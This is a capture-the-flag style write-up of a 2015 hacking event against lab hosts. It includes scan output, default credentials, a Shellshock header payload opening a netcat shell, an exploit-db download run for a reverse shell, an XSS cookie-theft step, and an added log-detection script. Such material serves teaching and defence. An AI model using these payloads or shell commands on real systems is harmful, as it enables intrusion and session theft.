usd AG Hacker Day in Hamburg

Do you remember this usd AG hacker challenge write-up? This year's hacking event organized by the same company took place in Hamburg. 9 hackers from all over Germany were invited to pwn&0wn all the things. Every team was assigned a certain IP range that had to be pentested. Every host identified within the IP range was rootable. And that's pretty much the information we had before conducting the pentest. My team got the IP range 10.10.10.20-29. Now let's have a look at the notes I took during the hacking session.

Targets

First run nmap for assigned IP range (10.10.10.20-29):

$ nmap -A -T4 10.10.10.20-29

10.10.10.20

1) Nmap results:

Nmap scan report for 10.10.10.20
Host is up (0.0025s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
| ssh-hostkey: 
|   1024 0b:2e:f0:93:f8:ad:8f:b7:c4:c2:1c:d2:d1:24:98:dc (DSA)
|   2048 c3:d5:b8:52:a9:3b:a7:79:83:2a:21:4f:81:4f:3f:d9 (RSA)
|_  256 d0:9e:0d:5c:c8:14:46:e5:10:c4:d9:85:12:33:37:0d (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          47289/tcp  status
|_  100024  1          52014/udp  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2) Nikto results:

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.10.20
+ Target Hostname:    10.10.10.20
+ Target Port:        80
+ Start Time:         2015-06-03 17:36:01 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 133083, size: 177, mtime: 0x513d254c3afa1
+ The anti-clickjacking X-Frame-Options header is not present.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3268: /private/: Directory indexing found.
+ OSVDB-3092: /private/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6545 items checked: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2015-06-03 17:36:26 (GMT2) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Observations:


  • Old version of Apache
  • Strange ports open: 47289/tcp, 52014/udp
  • http://10.10.10.20/private/info.txt contained:

      [email protected]:# 
      [email protected]:# mail 
      [email protected]:# hostname


Solutions:


  • Login to machine per SSH using user:user
  • Use a vulnerability in rbash (restricted bash) in order to run a normal bash
  • Check out crontab
  • Modify crontab entry to run commands as root

10.10.10.21

1) Nmap results:

Nmap scan report for 10.10.10.21
Host is up (0.0024s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.0)
| ssh-hostkey: 
|   1024 b8:08:0f:30:c2:68:ad:14:da:f3:aa:4f:ed:81:23:5d (DSA)
|_  2048 c5:99:11:f8:7a:9e:4c:0a:48:30:8b:9d:51:e6:3f:4f (RSA)
80/tcp open  http    Apache httpd 2.2.16 ((Debian))
| http-methods: Potentially risky methods: PUT DELETE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2) Nikto results:

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.10.21
+ Target Hostname:    10.10.10.21
+ Target Port:        80
+ Start Time:         2015-06-03 14:44:40 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/319 0x1356645490000 
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ Cookie JSESSIONID created without the httponly flag
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ OSVDB-68662: /axis2/axis2-web/HappyAxis.jsp: SAP BusinessObjects dswsbobje.war deploys Axis2 with a static admin password. See http://www.rapid7.com/security-center/advisories/R7-0037.jsp
+ /axis2/axis2-web/HappyAxis.jsp: Apache Axis2 was found
+ /manager/html: Default Tomcat Manager interface found
+ 6545 items checked: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2015-06-03 14:45:56 (GMT2) (76 seconds)
---------------------------------------------------------------------------


Observations:


  • Old version of SSH server
  • Old version of Apache server running Apache Tomcat
  • HTTP methods PUT and DELETE are available
  • The server is hosting an Axis2 instance


Solutions:


  • Login to Axis2 admin area using admin:axis2 (default password)
  • Upload a vulnerable service to Axis2 using metasploit (exploit/multi/http/axis2_deployer)
  • Fire a new shell (as user tomcat)
  • Have a look at /etc/passwd and notice that user is a "Debian Live User"
  • Google for Debian's live user default password (=live)
  • Login using user:live
  • sudo su --> root

10.10.10.22

1) Nmap results:

Nmap scan report for 10.10.10.22
Host is up (0.0023s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 03:d3:10:1a:5e:9b:f8:32:25:e9:af:e1:3f:5b:61:45 (DSA)
|_  2048 a2:4d:a5:aa:2a:e4:50:3d:03:cf:f6:5d:d7:e1:75:26 (RSA)
80/tcp   open  http    Apache httpd 2.2.3 ((CentOS))
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind 2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            873/udp  status
|_  100024  1            876/tcp  status
3306/tcp open  mysql   MySQL (unauthorized)

2) Nikto results:

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.10.22
+ Target Hostname:    10.10.10.22
+ Target Port:        80
+ Start Time:         2015-06-03 14:53:14 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Server leaks inodes via ETags, header found with file /, inode: 1360390, size: 65, mtime: 0x5068ebf68ea80
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6545 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2015-06-03 14:54:40 (GMT2) (86 seconds)
---------------------------------------------------------------------------


Observations:


  • Old version of SSH server
  • Old version of Apache server running
  • MySQL server is exposed to 0.0.0.0


Solutions:


  • Looking at the web application we've found this:

      $ curl -v "http://10.10.10.22/cgi-bin/hello.sh?hacker"
      *   Trying 10.10.10.22...
      * Connected to 10.10.10.22 (10.10.10.22) port 80 (#0)
      > GET /cgi-bin/hello.sh?hacker HTTP/1.1
      > Host: 10.10.10.22
      > User-Agent: curl/7.42.1
      > Accept: */*
      > 
      < HTTP/1.1 200 OK
      < Date: Wed, 03 Jun 2015 15:56:24 GMT
      < Server: Apache/2.2.3 (CentOS)
      < Content-Length: 13
      < Connection: close
      < Content-Type: text/plain; charset=UTF-8
      < 
      hello hacker
      * Closing connection 0
  • Modifying the parameters led to:

      $ curl -v "http://10.10.10.22/cgi-bin/hello.sh?hacker;asdk;ping alkjsd"
      *   Trying 10.10.10.22...
      * Connected to 10.10.10.22 (10.10.10.22) port 80 (#0)
      > GET /cgi-bin/hello.sh?hacker;asdk;ping alkjsd HTTP/1.1
      > Host: 10.10.10.22
      > User-Agent: curl/7.42.1
      > Accept: */*
      > 
      < HTTP/1.1 200 OK
      < Date: Wed, 03 Jun 2015 15:56:33 GMT
      < Server: Apache/2.2.3 (CentOS)
      < Content-Length: 25
      < Connection: close
      < Content-Type: text/plain; charset=UTF-8
      < 
      hello hacker\;asdk\;ping
      * Closing connection 0
  • Apache, cgi-bin, hello.sh ... That looked like a potential shellshock attack:

      $ curl -v -H "$(cat request)" "http://10.10.10.22/cgi-bin/hello.sh?hacker"
      *   Trying 10.10.10.22...
      * Connected to 10.10.10.22 (10.10.10.22) port 80 (#0)
      > GET /cgi-bin/hello.sh?hacker HTTP/1.1
      > Host: 10.10.10.22
      > Accept: */*
      > User-Agent: () { :;}; /bin/bash -c 'nc -l -p 4445 -e /bin/bash &'
      > 
      < HTTP/1.1 500 Internal Server Error
      < Date: Wed, 03 Jun 2015 15:57:10 GMT
      < Server: Apache/2.2.3 (CentOS)
      < Content-Length: 610
      < Connection: close
      < Content-Type: text/html; charset=iso-8859-1
      < 
      <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
      <html><head>
      <title>500 Internal Server Error</title>
      </head><body>
      <h1>Internal Server Error</h1>
      <p>The server encountered an internal error or
      misconfiguration and was unable to complete
      your request.</p>
      <p>Please contact the server administrator,
       [email protected] and inform them of the time the error occurred,
      and anything you might have done that may have
      caused the error.</p>
      <p>More information about this error may be available
      in the server error log.</p>
      <hr>
      <address>Apache/2.2.3 (CentOS) Server at 10.10.10.22 Port 80</address>
      </body></html>
      * Closing connection 0

    In the above curl output you can see that the User-Agent contains the payload:

      * run **netcat** and listen on port **4445**
      * when connecting to this port a new **bash** instance should be spawned
  • Unfortunately the manual way didn't work, so we found this Apache mod_cgi - Shellshock Remote Exploit (note: wget needs `-O`, not `-o`, to save the download under the given file name):

      $ wget https://www.exploit-db.com/download/34900 -O shellshock.py
      $ python2 shellshock.py payload=reverse rhost=10.10.10.22 \
          lhost=10.10.10.95 lport=4447 pages=http://10.10.10.22/cgi-bin/hello.sh
      ...

    That will give you a reverse shell on port 4447.

  • Having shell access to the machine, we started investigating the permissions on the file system. We found out that the current user (www-data I think) was able to read files inside /root.

      10.10.10.22> ls -l
          total 36
          -rw-r--r-- 1 root root 20396 May 18  2014 install.log
          -rw-r--r-- 1 root root  3148 May 18  2014 install.log.syslog
          -rw-r--r-- 1 root root    13 Feb 25 07:56 password-for-vpn.txt
    
      10.10.10.22> cat password-for-vpn.txt
      VeRySeCuRe_7
  • Logging in as user:VeRySeCuRe_7 via SSH was then successful
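The two request shapes seen above (shell metacharacters in the hello.sh query string, and a bash function definition arriving in the User-Agent header) are easy to spot on the server side. The following detection script is an added example and not part of the original write-up: it parses Apache "combined"-format access log lines (constructed here, modelled on the curl requests above) and flags both patterns.

```python
"""Flag Shellshock-style header probes and shell metacharacters in /cgi-bin/ queries
in Apache access logs. Constructed example; the log lines below are made up."""
import re
from urllib.parse import unquote

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Bash exports a function as an environment variable whose value starts with
# "() {"; a vulnerable bash runs whatever follows the closing brace. A header
# value shaped like that is a Shellshock probe, never legitimate traffic.
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')
# Characters a CGI script that hands its query string to a shell would treat
# as command separators; only meaningful for /cgi-bin/ paths.
SHELL_META_RE = re.compile(r'[;|`$&]')


def classify(line):
    """Return finding labels for one log line ([] if clean)."""
    m = COMBINED_RE.match(line)
    if not m:
        return ['unparseable']
    findings = []
    for field in ('ua', 'referer'):          # mod_cgi exports both as env vars
        if FUNC_DEF_RE.search(unquote(m.group(field))):
            findings.append('shellshock-header:' + field)
    parts = m.group('request').split(' ')    # "GET /path?query HTTP/1.1"
    if len(parts) >= 2:
        path, _, query = parts[1].partition('?')
        if path.startswith('/cgi-bin/') and SHELL_META_RE.search(unquote(query)):
            findings.append('cgi-shell-metachar')
    return findings


def scan(lines):
    """Return [(line_no, findings)] for every line with at least one finding."""
    return [(i, f) for i, l in enumerate(lines, 1) if (f := classify(l))]


# Constructed sample traffic modelled on the requests in the write-up.
SAMPLE_LOG = [
    '10.10.10.95 - - [03/Jun/2015:17:56:24 +0200] "GET /cgi-bin/hello.sh?hacker HTTP/1.1" 200 13 "-" "curl/7.42.1"',
    '10.10.10.95 - - [03/Jun/2015:17:56:33 +0200] "GET /cgi-bin/hello.sh?hacker;asdk;ping%20alkjsd HTTP/1.1" 200 25 "-" "curl/7.42.1"',
    '10.10.10.95 - - [03/Jun/2015:17:57:10 +0200] "GET /cgi-bin/hello.sh?hacker HTTP/1.1" 500 610 "-" "() { :;}; /bin/bash -c id"',
    '10.10.10.95 - - [03/Jun/2015:17:58:01 +0200] "GET /index.html?q=a;b HTTP/1.1" 200 177 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for no, findings in scan(SAMPLE_LOG):
        print(no, findings)   # -> 2 ['cgi-shell-metachar'] and 3 ['shellshock-header:ua']
```

The 500 status on the probing request is not itself the signal; the header shape is, which is why the check runs on the raw header fields rather than on the response code.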

10.10.10.23

1) Nmap results:

Nmap scan report for 10.10.10.23
Host is up (0.0025s latency).
Not shown: 986 closed ports
PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          SLmail smtpd 5.5.0.4433
| smtp-commands: mailer, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN, 
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT 
79/tcp    open  finger        SLMail fingerd
|_finger: Finger online user list request denied.
106/tcp   open  pop3pw        SLMail pop3pw
110/tcp   open  pop3          BVRP Software SLMAIL pop3d
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49156/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: mailer; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: mailer
|   NetBIOS computer name: MAILER
|   Workgroup: WORKGROUP
|_  System time: 2015-06-03T14:35:31+02:00
| smb-security-mode: 
|   Account that was used for smb scripts: <blank>
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol


Observations:


  • It's a Windows box :D
  • A lot of services are exposed
  • There is a smtpd running on port 25 (that might be interesting)


Solution:


  • Search in metasploit for SLmail smtpd 5.5.0.4433
  • Use found exploit to gain access to the machine
  • And voila you're logged in as admin

10.10.10.24

1) Nmap results:

Nmap scan report for 10.10.10.24
Host is up (0.0026s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.5p1 Debian 6+squeeze4 (protocol 2.0)
| ssh-hostkey: 
|   1024 5e:c5:45:45:52:12:47:04:1d:cc:b5:28:ca:91:5d:6c (DSA)
|_  2048 e3:29:e3:18:43:20:3d:c7:be:a9:7f:13:62:99:06:10 (RSA)
80/tcp open  http    Apache httpd 2.2.16 ((Debian))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: PentesterLab vulnerable blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 10 IP addresses (5 hosts up) scanned in 66.17 seconds

2) Nikto results:

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.10.24
+ Target Hostname:    10.10.10.24
+ Target Port:        80
+ Start Time:         2015-06-03 15:00:49 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.3-7+squeeze18
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.0.1/images/".
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 6756, size: 14634, mtime: 0x4e1d6b3f0db40
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ 6545 items checked: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2015-06-03 15:01:58 (GMT2) (69 seconds)


Observations:


  • It's a blog system
  • Authentication is done via session id (=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000)
  • There is an admin area (/admin/login.php)


Solution:


  • Inside the comments section you can store a persistent XSS
  • There is a cronjob which "visits" the site logged in as admin
  • The main idea was to steal the admin's session using the XSS:

    • Create XSS payload and send document.cookie to a box listening on a certain port
    • Using netcat you had to listen for the incoming request which exposed the admin's session
    • Once you have stolen the session you could use it to access the admin area
  • Inside the admin area there was a SQLi which you could use to read files from filesystem

  • Having read /etc/passwd you could see which users were available on the box
  • Log in as user:live to the machine (per SSH)
  • ? (I can't remember the last step(s) xD)

Conclusion

I'd like to thank usd AG for the organizational part and all participants for having a great time in Hamburg City.


Published: 2015-06-03 00:00
Tag: ctf10